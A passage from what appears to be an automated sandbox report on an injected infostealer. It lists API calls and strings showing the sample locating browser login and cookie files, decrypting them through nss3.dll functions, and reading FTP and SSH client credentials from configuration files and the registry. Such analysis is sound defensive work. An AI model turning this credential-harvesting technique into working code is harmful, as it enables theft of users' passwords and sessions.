                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0008366B
                                    • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 00083681
                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 000836AD
                                    • CloseHandle.KERNEL32(?), ref: 000836C0
                                    • CloseHandle.KERNEL32(00000000), ref: 000836F5
                                      • Part of subcall function 00081C9F: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00081CC0
                                      • Part of subcall function 00081C9F: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00081CDA
                                      • Part of subcall function 00081C9F: CloseHandle.KERNEL32(00000000), ref: 00081CE6
                                    • CloseHandle.KERNEL32(?), ref: 00083707
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: File$HandleProcess$CloseQuery$InformationPointer$CreateHeaplstrcmpi$AllocateCurrentDuplicateObjectOpenReadSizeWrite
                                    • String ID: File
                                    • API String ID: 3915112439-749574446
                                    • Opcode ID: 3a99b0d4a6b470b356a7520aeec362765019e2a7e87d638d3ccb8974909f4689
                                    • Instruction ID: 412b44e0d8d00dc2ce491ec342da3a435bd6f6606e26b2718310f2f2a6e93c77
                                    • Opcode Fuzzy Hash: 3a99b0d4a6b470b356a7520aeec362765019e2a7e87d638d3ccb8974909f4689
                                    • Instruction Fuzzy Hash: A661B170204301AFE720AF24CC44B6BBBE9FF88B51F140829F986D62A1D776DA558F61
                                    APIs
                                    • memcmp.NTDLL ref: 000D4502
                                    • memcmp.NTDLL ref: 000D475F
                                    • memcpy.NTDLL(00000000,00000000,00000000,00000002,?,00000000,000001D8,?,00000000), ref: 000D4803
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memcmp$memcpy
                                    • String ID: %s mode not allowed: %s$access$cach$cache$file$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s
                                    • API String ID: 231171946-1096842476
                                    • Opcode ID: 469582fbedf0ab11c86b6fdba566557ccccaf4d4e3592e5a386a2dc547f3de42
                                    • Instruction ID: ce351308a1f908dedbf48f95169a9ae32f1a57fce0a675a91a38d0dcd2b7ab44
                                    • Opcode Fuzzy Hash: 469582fbedf0ab11c86b6fdba566557ccccaf4d4e3592e5a386a2dc547f3de42
                                    • Instruction Fuzzy Hash: 7BC1F170A087828BDB74CF18D49077ABBE1AF9A314F14056FF8DA87342D734D8458B66
                                    APIs
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 00082B3D
                                    • lstrcmpiW.KERNEL32(?,000D62CC), ref: 00082B63
                                    • lstrcmpiW.KERNEL32(?,000D62D0), ref: 00082B7B
                                      • Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4
                                    • StrStrIW.SHLWAPI(00000000,logins.json), ref: 00082BE7
                                    • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 00082C16
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00082C43
                                    • FindClose.KERNEL32(00000000), ref: 00082C52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                    • String ID: \*.*$cookies.sqlite$logins.json
                                    • API String ID: 1108783765-3717368146
                                    • Opcode ID: 67bd7f795d4da5c9da4fb34461ee4484b492469efacdc514854bb532df0e0015
                                    • Instruction ID: e9e77636caf6dfbb37d4ac2b1a91f531cade9ce0109eeec82bb3336aa8a7f2d7
                                    • Opcode Fuzzy Hash: 67bd7f795d4da5c9da4fb34461ee4484b492469efacdc514854bb532df0e0015
                                    • Instruction Fuzzy Hash: 60318C303053015B9A14BB709899ABE77DABF84700B04492EF9C6D7283EF7AC9469762
                                    APIs
                                      • Part of subcall function 00086AAA: memset.NTDLL ref: 00086AC5
                                    • memset.NTDLL ref: 000A5F53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                    • API String ID: 2221118986-594550510
                                    • Opcode ID: 5320a1aa9eaddf7819d17075fcba68c20f18865c2da46462d93fd945543395bf
                                    • Instruction ID: c7ec09d7f9e119365fbf557bf23094a0b96bd21b70c7e2f6e443a934cfb2af9d
                                    • Opcode Fuzzy Hash: 5320a1aa9eaddf7819d17075fcba68c20f18865c2da46462d93fd945543395bf
                                    • Instruction Fuzzy Hash: 5BC18E716047019FCB54DF65C480A6BB7F2BF89700F18892EF8998B242DB36DD56CB92
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00082127
                                    • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0008213A
                                    • wsprintfA.USER32 ref: 0008214F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                    • String ID: %li
                                    • API String ID: 4120667308-1021419598
                                    • Opcode ID: c9dfe0ce2e226fb95f3959033191fbdb1a327d87d8ca9ea0e9cd7d0578bc45ca
                                    • Instruction ID: 464f19cd6c1ac757aedf0073579f65f9fcc87417aee82f84cc687bb841d95db3
                                    • Opcode Fuzzy Hash: c9dfe0ce2e226fb95f3959033191fbdb1a327d87d8ca9ea0e9cd7d0578bc45ca
                                    • Instruction Fuzzy Hash: 5DE0923264121877D7203BA89C06EEF7B6CDB40B16F040192FE00A6286D9635A6487E5
                                    APIs
                                    • CoCreateInstance.OLE32(000D62B0,00000000,00000001,000D62A0,?), ref: 0008445F
                                    • SysAllocString.OLEAUT32(?), ref: 000844AA
                                    • lstrcmpiW.KERNEL32(RecentServers,?), ref: 0008456E
                                    • lstrcmpiW.KERNEL32(Servers,?), ref: 0008457D
                                    • lstrcmpiW.KERNEL32(Settings,?), ref: 0008458C
                                      • Part of subcall function 000811E1: lstrlenW.KERNEL32(?,7570D5B5,00000000,?,00000000,?,000846E3), ref: 000811ED
                                      • Part of subcall function 000811E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0008120F
                                      • Part of subcall function 000811E1: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00081231
                                    • lstrcmpiW.KERNEL32(Server,?), ref: 000845BE
                                    • lstrcmpiW.KERNEL32(LastServer,?), ref: 000845CD
                                    • lstrcmpiW.KERNEL32(Host,?), ref: 00084657
                                    • lstrcmpiW.KERNEL32(Port,?), ref: 00084679
                                    • lstrcmpiW.KERNEL32(User,?), ref: 0008469F
                                    • lstrcmpiW.KERNEL32(Pass,?), ref: 000846C5
                                    • wsprintfW.USER32 ref: 0008471E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrcmpi$String$BinaryCrypt$AllocCreateInstancelstrlenwsprintf
                                    • String ID: %s:%s$Host$LastServer$Pass$Port$RecentServers$Server$Servers$Settings$User
                                    • API String ID: 2230072276-1234691226
                                    • Opcode ID: 3376d7830466d4f392724e7ed64b5d40cf53d611acc9bcdd8da55ad2bc886472
                                    • Instruction ID: 6fa7439c074e0e3adb43b0ca838f63fede25847a527bcff0c6dbe556fddf17e0
                                    • Opcode Fuzzy Hash: 3376d7830466d4f392724e7ed64b5d40cf53d611acc9bcdd8da55ad2bc886472
                                    • Instruction Fuzzy Hash: CDB10971208302AFD740EF64C884E6AB7E9FFC9755F00895CF5858B260DB72E806CB62
                                    APIs
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                      • Part of subcall function 00081090: lstrlenW.KERNEL32(?,?,00000000,000817E5), ref: 00081097
                                      • Part of subcall function 00081090: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000), ref: 000810A8
                                      • Part of subcall function 000819B4: lstrlenW.KERNEL32(00000000,00000000,00000000,00082CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000819C4
                                    • GetCurrentDirectoryW.KERNEL32(00000104,00000000), ref: 00082503
                                    • SetCurrentDirectoryW.KERNEL32(00000000), ref: 0008250A
                                    • LoadLibraryW.KERNEL32(00000000), ref: 00082563
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00082570
                                    • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00082591
                                    • GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0008259E
                                    • GetProcAddress.KERNEL32(00000000,SECITEM_FreeItem), ref: 000825AB
                                    • GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 000825B8
                                    • GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 000825C5
                                    • GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 000825D2
                                    • GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 000825DF
                                      • Part of subcall function 0008190B: lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
                                      • Part of subcall function 0008190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
                                      • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,?), ref: 00081946
                                      • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,00000000), ref: 0008194A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: AddressProc$lstrlen$CurrentDirectory$Heaplstrcat$AllocateByteCharLibraryLoadMultiProcessWide
                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$SECITEM_FreeItem$nss3.dll$sql:
                                    • API String ID: 3366569387-3272982511
                                    • Opcode ID: 0db36531a46e31402c1dd5630552be119792c2454c9f4c8c29a6555ac291f582
                                    • Instruction ID: a7b2f55276dc6ac50742344987b6cea75d31b9ec158fb1cb6e5e99546c7f3b94
                                    • Opcode Fuzzy Hash: 0db36531a46e31402c1dd5630552be119792c2454c9f4c8c29a6555ac291f582
                                    • Instruction Fuzzy Hash: 87411731A043459BDB14BB759C945EE3BE9BF85B41700003FE8C1AB392DB798C428FA1
                                    APIs
                                      • Part of subcall function 00085BF5: memset.NTDLL ref: 00085C07
                                    • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000860E1
                                    • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000860EC
                                    • _alldiv.NTDLL(?,?,000003E8,00000000), ref: 00086113
                                    • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 0008618E
                                    • _alldiv.NTDLL(?,?,05265C00,00000000), ref: 000861B5
                                    • _allrem.NTDLL(00000000,?,00000007,00000000), ref: 000861C1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _alldiv$_allrem$memset
                                    • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                    • API String ID: 2557048445-1989508764
                                    • Opcode ID: 13b2ebc93722260598afb2851c972d3b21a4786601c7d085fc2222c1bc1ec27f
                                    • Instruction ID: 03fa02d3f8a719d05051c4cd3801ad853ace6c955944cf10748c41d0e2873fd6
                                    • Opcode Fuzzy Hash: 13b2ebc93722260598afb2851c972d3b21a4786601c7d085fc2222c1bc1ec27f
                                    • Instruction Fuzzy Hash: CDB18EB1908B429BD735BE24CC85B3B7FD4FB40345F250699F9C2A6293EA22CD108795
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memcmp
                                    • String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$,%d$,%s%s$BINARY$NULL$k(%d$program$vtab:%p
                                    • API String ID: 1475443563-3683840195
                                    • Opcode ID: 4a8a2c4b92b206e84d1ba56d33b102cd6b946ca4f1cce0085908098517f16554
                                    • Instruction ID: f8638983eaaee7809f1050d377c2d4bc75db0ae36d20404bd335ad5730879edd
                                    • Opcode Fuzzy Hash: 4a8a2c4b92b206e84d1ba56d33b102cd6b946ca4f1cce0085908098517f16554
                                    • Instruction Fuzzy Hash: 81513631548700ABCB20DF64DC41AABB3E5FF45700F14896BFA958B242E771ED05EBA2
                                    APIs
                                    • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00082AD2
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 000829E1
                                    • lstrlen.KERNEL32(00000000), ref: 000829EC
                                    • wsprintfA.USER32 ref: 00082A38
                                    • lstrlen.KERNEL32(00000000), ref: 00082A44
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00082A6C
                                    • lstrlen.KERNEL32(00000000,?,?), ref: 00082A99
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                    • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                    • API String ID: 304071051-2605711689
                                    • Opcode ID: 937e8feedcaa13e8e682da5f49011108d7c6ef680d76c4f8f3e7050302dc4e1f
                                    • Instruction ID: abc7e99e80b7944e8c50556b14567379447db6d12a69f2c55adc012d86cb8399
                                    • Opcode Fuzzy Hash: 937e8feedcaa13e8e682da5f49011108d7c6ef680d76c4f8f3e7050302dc4e1f
                                    • Instruction Fuzzy Hash: AC516F306083469BD725FF209851A7E7BDABF85305F04482DF9C59B253DB39DC468B62
                                    APIs
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                      • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                      • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                      • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                      • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                      • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                      • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                    • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 00082D13
                                    • StrStrIW.SHLWAPI(00000000,Profile), ref: 00082D45
                                    • GetPrivateProfileStringW.KERNEL32(00000000,Path,000D637C,?,00000FFF,?), ref: 00082D68
                                    • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 00082D7B
                                    • lstrlenW.KERNEL32(00000000), ref: 00082DD8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                    • String ID: IsRelative$Path$Profile$profiles.ini
                                    • API String ID: 2234428054-4107377610
                                    • Opcode ID: 1910aacd158bad459efd24714dfcbf82a14fa5d51a064646f64bad5c31318d54
                                    • Instruction ID: d0ec9b20c8ca92714faf777618d1b70af53ee0a0b71a422be70b8ac64c31e16e
                                    • Opcode Fuzzy Hash: 1910aacd158bad459efd24714dfcbf82a14fa5d51a064646f64bad5c31318d54
                                    • Instruction Fuzzy Hash: D73160346043015BD754BF709C516AF7BE6BFC8700F14442EF986AB292DF7A8C869B52
                                    APIs
                                      • Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                      • Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                      • Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                      • Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                      • Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 00084845
                                      • Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 0008488F
                                      • Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 00084897
                                    • wsprintfW.USER32 ref: 000849A7
                                    • wsprintfW.USER32 ref: 000849B9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                    • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                    • API String ID: 2889301010-4273187114
                                    • Opcode ID: da7e63671b0f4e93c4154db471155565ad8701d4588ea6bee2a31a56f36f1af4
                                    • Instruction ID: 10d8c462f0a5d1c46246b3851c8024d5f0b7ca74f221d7c66667859a4483cc7f
                                    • Opcode Fuzzy Hash: da7e63671b0f4e93c4154db471155565ad8701d4588ea6bee2a31a56f36f1af4
                                    • Instruction Fuzzy Hash: 1631DE357043056BC760FBA5D84196BB6EDFF89788B05492EF4C587282DAB2DC0287A1
                                    APIs
                                    • memcpy.NTDLL(?,?,?,?,00000000), ref: 0008FB32
                                    • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0008FB4D
                                    • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0008FB60
                                    • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0008FB95
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: -journal$-wal$immutable$nolock
                                    • API String ID: 3510742995-3408036318
                                    • Opcode ID: 2ba235b4505612062e78cee2fce8280b65b643895955b6fa507b90e5b2a5b768
                                    • Instruction ID: 294a5ab0152734e0fc343f7e435cb1baaece950d4deabf5daa23531a8e1283f6
                                    • Opcode Fuzzy Hash: 2ba235b4505612062e78cee2fce8280b65b643895955b6fa507b90e5b2a5b768
                                    • Instruction Fuzzy Hash: 33D19FB16083418FDB14EF28C881B6ABBE5BF95314F08457DE8D98B392DB75D805CB62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %$-x0$NaN
                                    • API String ID: 0-62881354
                                    • Opcode ID: b7fc07bd73d9a66ecfa12115a04d499e187338113120827c6c09aada8c07791c
                                    • Instruction ID: 6c4157ef6abc8789903b41b48f2750967716a0974ef9a8a2f7a86ce0e4b3c3ae
                                    • Opcode Fuzzy Hash: b7fc07bd73d9a66ecfa12115a04d499e187338113120827c6c09aada8c07791c
                                    • Instruction Fuzzy Hash: 11D1233060C3828BD775AA28849477EBBE1BF96304F38486EF8C98735AD665C941DB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -x0$NaN
                                    • API String ID: 0-3447725786
                                    • Opcode ID: baa124e87dbeebc4b253c9e50b368a5f420b0208ca8c1b5c65a5900b34f298eb
                                    • Instruction ID: 307a0fbc714bec583ddb3da5ca31e1c7d01a1585dd17795543b9f6cbd4a72020
                                    • Opcode Fuzzy Hash: baa124e87dbeebc4b253c9e50b368a5f420b0208ca8c1b5c65a5900b34f298eb
                                    • Instruction Fuzzy Hash: 93E1253060C3828BD775AA28C49476EBBE1BF96304F38486EF8C99735AD665CD40DB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -x0$NaN
                                    • API String ID: 0-3447725786
                                    • Opcode ID: ebc82d06261bcdc239f2784bd31ea377c46de16c779e0eaa0c3f6f362a9a2d65
                                    • Instruction ID: 5af4e4da5cea5f154fd119f3d2ed9d99af7aef6557b7613b941435b73212b324
                                    • Opcode Fuzzy Hash: ebc82d06261bcdc239f2784bd31ea377c46de16c779e0eaa0c3f6f362a9a2d65
                                    • Instruction Fuzzy Hash: F7E1023060C3828BD765EE28C49476EBBE1BF96304F38486EF8C98735AD665CD41DB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -x0$NaN
                                    • API String ID: 0-3447725786
                                    • Opcode ID: 532721f6db3cf2cbfeb1db598ccdea50ef7b32de67f7a8ad80d7cb47558c555b
                                    • Instruction ID: 38d80dc272db12f369c27d8ab9e1b9b3f46e7504c94a09ddbb968d65dca4388f
                                    • Opcode Fuzzy Hash: 532721f6db3cf2cbfeb1db598ccdea50ef7b32de67f7a8ad80d7cb47558c555b
                                    • Instruction Fuzzy Hash: 5EE1133060C3828BD765EE28C49476EBBE1BF96304F38486EF8C99735AD675C940DB52
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -x0$NaN
                                    • API String ID: 0-3447725786
                                    • Opcode ID: 33658ef99b809653cf9f5d760d5af93decb8784d64679dbb4ead0c2aed41e7c4
                                    • Instruction ID: 9eb325d8b13de8419a12c3c1fdebbe1caf842573b04f619f98d2af9db357284b
                                    • Opcode Fuzzy Hash: 33658ef99b809653cf9f5d760d5af93decb8784d64679dbb4ead0c2aed41e7c4
                                    • Instruction Fuzzy Hash: 9BE1123060C3828BD765EF28C49476EBBE1BF96304F38486EF8C99735AD665C940DB52
                                    APIs
                                    • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0008720E
                                    • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00087226
                                    • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0008727B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _aulldvrm$_aullrem
                                    • String ID: -x0$NaN
                                    • API String ID: 105165338-3447725786
                                    • Opcode ID: 2362ef364301674ff0b2ccf661c30ce3b42df2588c24734a6dbe200c93ed4eb4
                                    • Instruction ID: 93f17d4b0f8c4b3a8157bc224e6fc931d5739e06ef0917fc6c2979ba7e56ff20
                                    • Opcode Fuzzy Hash: 2362ef364301674ff0b2ccf661c30ce3b42df2588c24734a6dbe200c93ed4eb4
                                    • Instruction Fuzzy Hash: E4D1123060C3828BD775AF28849477EBBE1BF96304F38486EF8C98735AD665C941DB52
                                    APIs
                                    • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00088AAD
                                    • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00088B66
                                    • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00088C9B
                                    • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00088CAE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: _allmul$_alldvrm
                                    • String ID: .
                                    • API String ID: 115548886-248832578
                                    • Opcode ID: 1dee9addea6f3844f4b09b2805f88c775bd20230e2989cbee6f0ea89815203b6
                                    • Instruction ID: a618595783e7f2a3f3ba0156b31e79fd035265a36e404902bbfeef64cd03ac86
                                    • Opcode Fuzzy Hash: 1dee9addea6f3844f4b09b2805f88c775bd20230e2989cbee6f0ea89815203b6
                                    • Instruction Fuzzy Hash: E0D1F3B190C7858BD724EF08888427EBBF0FFD5314F44896EF6C596281DBB1C9458B96
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000012.00000002.525291505.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                    Similarity
                                    • API ID: memset
                                    • String ID: ,$7$9
                                    • API String ID: 2221118986-1653249994
                                    • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                    • Instruction ID: 702d2cd818da1550f47cb19b98de18b775bc913f1f07b666f171365b98cff46d
                                    • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                    • Instruction Fuzzy Hash: EC316A715083849FE731DF60D844B8FBBE8AF85340F00892EF98997252EB759549CBA2
                                    APIs
